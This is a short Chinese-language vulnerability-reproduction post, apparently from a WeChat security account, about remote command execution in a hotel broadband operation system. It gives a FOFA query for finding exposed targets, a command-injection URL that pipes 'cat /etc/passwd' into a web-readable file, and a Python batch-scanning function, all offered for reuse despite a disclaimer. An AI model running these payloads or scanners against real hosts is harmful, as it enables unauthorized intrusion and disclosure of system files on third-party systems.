免责声明:
由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!
FOFA语句:
title="酒店宽带运营"
POC:
http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1
脚本代码:
def poc(url):
print("-"*50)
print("开始检测: "+url)
target = url+"/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
r = requests.get(url=target,timeout=8,verify=False)
if r.status_code ==200 and "parent.doTestResult" in r.text:
print(url+" 漏洞存在!")
print("请访问:"+url+"/Test.txt")
print("-"*50)
print("n")
else:
print(url+" 漏洞不存在!")
print("-"*50)
print("n")
利用截图:
支持批量检测!
利用说明:
检测成功后,若存在漏洞,会向Test.txt文件写入cat /etc/passwd的内容,访问url/Test.txt即可访问到内容!回复:酒店宽带运营系统RCE 即可获取脚本!
本文始发于微信公众号(Fight Tigers Team):漏洞复现-酒店宽带运营系统RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论